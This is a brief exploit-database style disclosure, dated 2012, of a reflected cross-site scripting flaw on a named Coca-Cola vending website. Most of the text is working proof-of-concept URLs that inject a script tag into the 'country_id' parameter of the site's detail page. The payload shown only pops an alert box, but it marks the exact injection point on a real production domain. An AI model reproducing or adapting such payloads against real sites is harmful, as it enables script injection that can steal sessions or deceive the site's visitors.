www.virtualvender.coca-cola.com suffers from a cross site scripting vulnerability.
f724b597e457057898561bb6588fc64bdfb879357760d01497a61f8caaa964e6
# Exploit Title: coca-cola xss
# Date: 19.08.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: Php
------------------------------------------------------------------
http://www.virtualvender.coca-cola.com/ft/detail.jsp?region_id=1&country_id=8 XSS &drink_type_id=003&all_reg_selected=0&brand_id=765
<Script>alert("TayfunBasoglu")</script>
http://www.virtualvender.coca-cola.com/ft/detail.jsp?region_id=1
&country_id=8<Script>alert("TayfunBasoglu")</script>&drink_type_id=003&all_reg_selected=0&brand_id=765
------------------------------------------------------------------
tayfunbasoglu.blogspot.com